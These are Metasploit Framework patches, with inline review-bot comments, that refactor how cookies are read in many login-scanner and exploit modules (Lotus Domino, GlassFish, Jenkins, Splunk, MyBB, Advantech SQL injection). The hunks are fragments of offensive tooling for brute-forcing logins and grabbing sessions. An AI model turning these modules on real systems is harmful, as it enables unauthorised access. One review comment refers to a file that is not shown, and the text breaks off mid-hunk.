--- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
+++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb
@@ -93,10 +93,10 @@ class Metasploit3 < Msf::Auxiliary
 return
 end
- if (res and res.code == 302 )
- if res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i)
+ if res and res.code == 302
+ if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)
 cookie = "DomAuthSessId=#{$1}"
- elsif res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/LtpaToken=(.*);(.*)/i)
+ elsif res.get_cookies.match(/LtpaToken=(.*);(.*)/i)
 cookie = "LtpaToken=#{$1}"
 else
 print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")
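Review bot: `m = res.get_cookies.match(/(PHPSESSID=.+);/)` in vcms_login.rb dereferences `res` with no nil check, so a request that returns nil raises NoMethodError instead of yielding a nil session id. The visible context shows nothing between the request's closing `})` and this line. Other hunks in this commit add the guard (for example `return [nil, nil] if res.nil? || res.get_cookies.empty?` in dolibarr_login.rb), and `return nil if res.nil?` before the match would do the same here. The method starts outside the hunk.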
diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
index a9a4bcec10..3ddd187895 100644
--- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
+++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
@@ -45,8 +45,8 @@ class Metasploit3 < Msf::Auxiliary
 'data' => post_data,
 }, 20)
- if (res and res.code == 302 )
- if res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i)
+ if res and res.code == 302
+ if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)
 print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL login for '#{user}' : '#{pass}'")
 report_auth_info(
 :host => rhost,
diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb
index 07eaecf3bf..4c67510bd9 100644
--- a/modules/auxiliary/scanner/msf/msf_web_login.rb
+++ b/modules/auxiliary/scanner/msf/msf_web_login.rb
@@ -76,9 +76,9 @@ class Metasploit3 < Msf::Auxiliary
 token = ''
 uisession = ''
- if res and res.code == 200 and res.headers['Set-Cookie']
+ if res and res.code == 200 and !res.get_cookies.empty?
 # extract tokens from cookie
- res.headers['Set-Cookie'].split(';').each {|c|
+ res.get_cookies.split(';').each {|c|
 c.split(',').each {|v|
 if v.split('=')[0] =~ /token/
 token = v.split('=')[1]
diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb
index 9c037550bd..97cbd4664c 100644
--- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb
+++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
 'headers' => { 'Authorization' => "Basic #{@user_pass}"}
 }, 25)
 if res
- @vim_cookie = res.headers['Set-Cookie']
+ @vim_cookie = res.get_cookies
 if res.code== 200
 res.body.scan(/<a href="([\w\/\?=&;%]+)">/) do |match|
 link = match[0]
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
 'headers' => { 'Authorization' => "Basic #{@user_pass}"}
 }, 25)
 if res
- @vim_cookie = res.headers['Set-Cookie']
+ @vim_cookie = res.get_cookies
 if res.code == 200
 img = res.body
 ss_path = store_loot("host.vmware.screenshot", "image/png", datastore['RHOST'], img, name , "Screenshot of VM #{name}")
diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
index ad798e8969..d50b15a7da 100644
--- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb
+++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
@@ -78,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote
 'uri' => @uri.path
 })
- return [nil, nil] if not (res and res.headers['Set-Cookie'])
+ return [nil, nil] if res.nil? || res.get_cookies.empty?
 # Get the session ID from the cookie
- m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/)
+ m = res.get_cookies.match(/(DOLSESSID_.+);/)
 id = (m.nil?) ? nil : m[1]
 # Get the token from the decompressed HTTP body response
diff --git a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
index bc02f5d255..184ea9c2e6 100644
--- a/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
+++ b/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb
@@ -67,7 +67,7 @@ class Metasploit4 < Msf::Exploit::Remote
 if res.headers['Location'] =~ /users\/login$/
 fail_with(Failure::NoAccess, 'Authentication failed')
 else
- session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
+ session = $1 if res.get_cookies =~ /_session_id=([0-9a-f]*)/
 fail_with(Failure::UnexpectedReply, 'Failed to retrieve the current session id') if session.nil?
 end
diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb
index 676e931b3d..cbc3fc3043 100644
--- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb
+++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'josso_password' => datastore['PASSWORD']
 }
 })
- if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/
+ if res and res.get_cookies =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/
 return $1
 else
 return nil
diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb
index 03d03adf5f..e0fa99ef5e 100644
--- a/modules/exploits/linux/http/mutiny_frontend_upload.rb
+++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'method' => 'GET'
 })
- if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+ if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/
 first_session = $1
 end
@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'cookie' => "JSESSIONID=#{first_session}"
 })
- if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+ if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=(.*);/
 @session = $1
 return true
 end
diff --git a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb
index accf593b61..e7a568baf2 100644
--- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb
+++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'iptest' => "127.0.0.1" # In order to make things as fast as possible
 }
 })
- if res and res.code == 200 and res.headers.include?('Set-Cookie') and res.headers['Set-Cookie'] =~ /SESSIONID/
+ if res and res.code == 200 and res.get_cookies.include?('SESSIONID')
 return res.get_cookies
 else
 return nil
diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb index d926fafdce..7a6bf553b4 100644 --- a/modules/exploits/multi/http/activecollab_chat.rb +++ b/modules/exploits/multi/http/activecollab_chat.rb @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote # response handling if res and res.code == 302 - if (res.headers['Set-Cookie'] =~ /ac_ActiveCollab_sid_eaM4h3LTIZ=(.*); expires=/) + if res.get_cookies =~ /ac_ActiveCollab_sid_[a-zA-Z0-9]+=(.*); expires=/ acsession = $1 end elsif res and res.body =~ /Failed to log you in/ diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index acf1734552..dfe58bb7d6 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -283,7 +283,7 @@ class Metasploit3 < Msf::Exploit::Remote # likely to change success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1) - if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/) + if res.get_cookies =~ /JSESSIONID=(.*);/ session = $1 end end @@ -319,7 +319,7 @@ class Metasploit3 < Msf::Exploit::Remote # likely to change success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1) - if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/) + if res.get_cookies =~ /JSESSIONID=(.*);/ session = $1 end end diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 7115369187..042f17ccd2 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb 
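Review bot: The pattern in activecollab_chat.rb still requires the literal `; expires=` after the session value, which only matches if get_cookies keeps cookie attributes. If it returns bare name=value pairs (worth confirming against the Rex implementation), the branch never matches and `acsession` stays unset with no error. Matching on the value alone removes that dependency: `if res.get_cookies =~ /ac_ActiveCollab_sid_[a-zA-Z0-9]+=([^;]*)/`. The patterns ending in `; ` in glassfish_deployer.rb and rails_secret_deserialization.rb carry a similar risk, since they would presumably miss a cookie that ends the returned string without a trailing space.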
@@ -684,7 +684,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying #{type} credentials for GlassFish 2.x #{user}:'#{pass}'....") res = try_login(user,pass) if res and res.code == 302 - session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i) + session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i res = send_request('/applications/upload.jsf', 'GET', session) p = /<title>Deploy Enterprise Applications\/Modules/ @@ -697,7 +697,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying #{type} credentials for GlassFish 3.x #{user}:'#{pass}'....") res = try_login(user,pass) if res and res.code == 302 - session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i) + session = $1 if res and res.get_cookies =~ /JSESSIONID=(.*); /i res = send_request('/common/applications/uploadFrame.jsf', 'GET', session) p = /<title>Deploy Applications or Modules/ @@ -788,7 +788,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Glassfish edition: #{banner}") #Get session - res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); / + res.get_cookies =~ /JSESSIONID=(.*); / session = $1 #Set HTTP verbs. lower-case is used to bypass auth on v3.0 diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 56c54d1008..aec23ca800 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.code == 200 vprint_error("#{peer} - Authentication failed") return Exploit::CheckCode::Unknown - elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ + elsif res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ vprint_good("#{peer} - Authenticated successfully") return Exploit::CheckCode::Appears end 
@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote # login; get session id and token print_status("#{peer} - Authenticating as user '#{user}'") res = login(base, user, pass) - if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ + if res and res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ token = "#{$1}" sid = "#{$2}" print_good("#{peer} - Authenticated successfully") diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 825701d651..90b9a989e2 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST' ) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/ + if res and res.code == 200 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 else print_error("#{peer} - Retrieve of initial JSESSIONID failed") @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 302 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/ + if res and res.code == 302 and res.get_cookies =~ /JSESSIONID=([0-9A-F]*);/ session_id = $1 redirect = URI(res.headers['Location']).path else diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 581fbce608..dabfe034c6 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote # CpqElm-Login: success if res.headers['CpqElm-Login'].to_s =~ /success/ - cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || '' + cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || '' end cookie 
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 3c7bf20530..73e8d7adee 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/ fail_with(Failure::NoAccess, 'login failed') end - sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0] + sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0] @cookie = "#{sessionid}" else print_status('No authentication required, skipping login...') diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index d4cadae1c7..900c5a6418 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.get_cookies =~ /JSESSIONID=(.*);/ print_good("#{peer} - Login successful") session = $1 else diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index a885cb3901..6854cd78bb 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote }) # If we don't get a cookie, bail! - if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/ + if res and res.get_cookies =~ /(PHPVolunteerManagent=\w+);*/ cookie = $1 vprint_status("#{peer} - Found cookie: #{cookie}") else 
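Review bot: In jenkins_script_console.rb, `res.get_cookies.split('JSESSIONID')[1]` is nil when the 302 response carries no JSESSIONID cookie, so the chained `.split('; ')` raises NoMethodError instead of failing cleanly. A guarded extraction reports the condition explicitly: `sessionid = res.get_cookies[/JSESSIONID[^;]*/]` followed by `fail_with(Failure::UnexpectedReply, 'No JSESSIONID in login response') if sessionid.nil?`. The enclosing method starts and ends outside the hunk.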
diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index c6eeac426b..1315ed710e 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => uri, }, 3) - if (res.nil? or not res.headers['Set-Cookie']) + if res.nil? or res.get_cookies.empty? print_error("Could not generate a valid session") return end - return res.headers['Set-Cookie'] + return res.get_cookies end def cleanup diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 0478b23dd5..c9f5931858 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - cookie = (res and res.headers['Set-Cookie'] =~ /qdpm\=.+\;/) ? res.headers['Set-Cookie'] : '' + cookie = (res and res.get_cookies =~ /qdpm\=.+\;/) ? res.get_cookies : '' return {} if cookie.empty? cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0] diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 46751d2f1f..7803dd5414 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -233,8 +233,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => datastore['TARGETURI'] || "/", 'method' => datastore['HTTP_METHOD'], }, 25) - if res && res.headers['Set-Cookie'] - match = res.headers['Set-Cookie'].match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) + if res && !res.get_cookies.empty? + match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) end if match 
diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index 1e2cd51567..d8f6f00de9 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb +++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -86,8 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.headers['Set-Cookie'] =~ /PHPSESSID/ and res.body !~ /\<i\>Access denied\!\<\/i\>/ - return res.headers['Set-Cookie'] + if res and res.get_cookies.include?('PHPSESSID') and res.body !~ /\<i\>Access denied\!\<\/i\>/ + return res.get_cookies else return '' end diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index d85302620b..92d4380c43 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.code == 302 and res.headers['Location'] =~ /main.php/) print_status("Successfully logged in as #{user}:#{pass}") - if (res.headers['Set-Cookie'] =~ /SiTsessionID/) and res.headers['Set-Cookie'].split("SiTsessionID")[-1] =~ /=(.*);/ + if (res.get_cookies =~ /SiTsessionID/) and res.get_cookies.split("SiTsessionID")[-1] =~ /=(.*);/ session = $1 print_status("Successfully retrieved cookie: #{session}") return session diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index 2725ba5f81..cae9a80878 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -124,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote uid = '' session_id_port = session_id = '' - if res and res.code == 200 and res.headers['Set-Cookie'] - res.headers['Set-Cookie'].split(';').each {|c| + if res and res.code == 200 and !res.get_cookies.empty? + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /cval/ cval = v.split('=')[1] 
@@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote else session_id_port = '' session_id = '' - res.headers['Set-Cookie'].split(';').each {|c| + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /session_id/ session_id_port = v.split('=')[0] diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 0c710b83ac..35e5f85241 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote session_id_port = session_id = '' if res and res.code == 200 - res.headers['Set-Cookie'].split(';').each {|c| + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /cval/ cval = v.split('=')[1] @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote else session_id_port = '' session_id = '' - res.headers['Set-Cookie'].split(';').each {|c| + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /session_id/ session_id_port = v.split('=')[0] From c421b8e5121e9b42aeb1f3ed9479381a6f0b9d96 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Wed, 14 May 2014 01:24:29 -0500 Subject: [PATCH 309/853] Change if not to unless --- .../windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index c3595b637e..8a16697870 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb 
@@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote # since we need to have credentials for this vuln, we just login and run a query # to get the version information version = mssql_query_version - if not version + unless version return Exploit::CheckCode::Safe end print_status("@@version returned:\n\t" + version) From cbb84e854ca35f66b5b199a63fdedfc52b1d4e9d Mon Sep 17 00:00:00 2001 From: Karmanovskii <fnsnic@gmail.com> Date: Wed, 14 May 2014 14:56:40 +0400 Subject: [PATCH 310/853] Update mybb_get_type_db.rb 14.05.2014 Eliminated notes jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 143 +++++++++---------- 1 file changed, 69 insertions(+), 74 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index ad1e413cab..a61c1166d1 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -12,27 +12,19 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + Determine the database in the forum. + This affects versions <= 1.6.12 }, 'Author' => [ - #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii <fnsnic[at]gmail.com>'#Discovery and Metasploit Module + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii <fnsnic[at]gmail.com>'#Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 13 2014')) register_options( 
@@ -43,78 +35,81 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_cgi({ + 'uri' => uri, + 'method' => 'GET',}) + if req.nil? + print_error("Failed to retrieve webpage.") + return Exploit::CheckCode::Unknown + end + if req + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? - end + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? 
+ end - #Check Web-Server - _version_server = res['Server'] - if _version_server - _version_server = " Server Version: #{_version_server}".ljust(40) - else - _version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! 
This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end end def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) + response = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") + print_error("Failed to retrieve webpage.") + return end #Resolve response From 5b3bb8fb3b25e6e8358fa97af5b7f9865ee3efd8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 14 May 2014 09:00:13 -0500 Subject: [PATCH 311/853] Fix @FireFart's review --- .../advantech_webaccess_dbvisitor_sqli.rb | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) 
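Review bot: In `run`, the request headers (Accept, User-Agent, Cookie and the rest) were moved under `'vars_get'`, so they are now sent as query-string parameters rather than HTTP headers. The key should stay `'headers' => {`, and the `letter=-1` parameter currently embedded in the URI is what belongs in `'vars_get'`. In `check`, the new `if req.nil?` guard makes the `else` branch of the following `if req` unreachable. `res.code` is also read without checking that `send_recv` returned a response, so `unless res && res.code == 200` would be safer there. The local `_Version_server` would read better as `server_version`.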
diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 1d6617fd25..fc0b0b772a 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => xml }) - unless res and res.code == 200 and res.body.to_s =~ /#{mark}/ + unless res && res.code == 200 && res.body && res.body.include?(mark) return nil end @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary def parse_users(xml, mark) doc = Document.new(xml) - strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string") + strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text) strings_length = strings.length unless strings_length > 1 @@ -110,13 +110,13 @@ class Metasploit3 < Msf::Auxiliary i = 0 strings.each do |result| - next if result.text == mark + next if result == mark if i < (strings_length / 3) - @users.push(result.text) + 